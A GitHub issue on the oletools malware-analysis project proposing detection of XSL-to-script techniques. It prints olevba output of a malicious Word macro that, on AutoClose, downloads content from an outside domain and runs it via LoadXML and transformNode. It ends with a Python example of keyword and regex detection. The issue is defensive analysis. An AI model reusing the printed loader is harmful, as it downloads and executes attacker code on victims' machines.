decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

olevba, mraptor: add keywords LoadXML/transformNode for XSL to script #851

Open decalage2 opened 8 months ago

decalage2 commented 8 months ago

Several recent samples use LoadXML and transformNode methods (on a MSXML2.DomDocument COM object) to apply an XSL stylesheet to XML data and obtain a malicious JavaScript which seems to be executed automatically:

transformNode: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms761399(v=vs.85)

more info:

$ olevba bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc 
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AUtoclose           |Runs when the Word document is closed        |
|Suspicious|Open                |May open a file                              |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|MSXML2.xmlhttp      |May download files from the Internet         |
|IOC       |https://adfhjiuyqnma|URL                                          |
|          |hdfiuad.com/index.ph|                                             |
|          |p                   |                                             |
+----------+--------------------+---------------------------------------------+
decalage2 commented 1 month ago

Also another sample using transformNodeToObject: https://x.com/vmray/status/1844362742595018809

https://www.vmray.com/analyses/_vt/205a543c733e/report/overview.html

https://labs.inquest.net/dfi/sha256/205a543c733eea51309dea6fa850f87bcaeefa1835bd0955ea43923820e2834e
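As an added example (not oletools' own code) of what the proposed keywords would catch, here is a case-insensitive scan for the LoadXML / transformNode / transformNodeToObject pattern in VBA source, plus an mraptor-style verdict that combines an auto-exec trigger with the XSL transform, run against the macro from this issue with the URL replaced; the keyword table, regexes and sample URL are the example's own assumptions.

```python
import re

# Candidate additions to the olevba/mraptor keyword tables proposed in this issue.
# This table is the example's own, loosely shaped like olevba's (description,
# keywords) tuples; it is not oletools code.
XSL_SCRIPT_KEYWORDS = (
    ("May run script embedded in an XSL stylesheet (XSL to script)",
     ("transformNode", "transformNodeToObject")),
    ("May load XML/XSL from a string (e.g. an HTTP response)", ("LoadXML",)),
    ("May create an MSXML DOM document object", ("MSXML2.DomDocument",)),
)
AUTOEXEC_RE = re.compile(r"\b(Auto_?Open|Auto_?Close|Document_(Open|Close))\b", re.I)
DOWNLOAD_RE = re.compile(r"MSXML2\.(Server)?XMLHTTP", re.I)

# Constructed sample: the macro from this issue with the URL replaced by a placeholder.
SAMPLE_VBA = """Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://example.invalid/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
"""

def find_xsl_script_keywords(vba_code):
    """Return [(keyword as written, description)] for every hit. VBA names are
    case-insensitive (the sample writes 'tRAnsformnode'), so match with re.I."""
    hits = []
    for description, keywords in XSL_SCRIPT_KEYWORDS:
        for kw in keywords:
            for m in re.finditer(r"\b" + re.escape(kw) + r"\b", vba_code, re.I):
                hits.append((m.group(0), description))
    return hits

def triage(vba_code):
    """mraptor-style verdict: an auto-exec trigger combined with an XSL transform
    (an Execute-class action) is the pattern shared by both samples in this issue."""
    hits = find_xsl_script_keywords(vba_code)
    flags = {
        "autoexec": bool(AUTOEXEC_RE.search(vba_code)),
        "download": bool(DOWNLOAD_RE.search(vba_code)),
        "xsl_transform": any(k.lower().startswith("transformnode") for k, _ in hits),
    }
    flags["suspicious"] = flags["autoexec"] and flags["xsl_transform"]
    return flags
```

Calling `find_xsl_script_keywords(SAMPLE_VBA)` yields the three hits as written in the macro, and `triage(SAMPLE_VBA)` sets every flag because the sample has AutoClose, an XMLHTTP download and the transform.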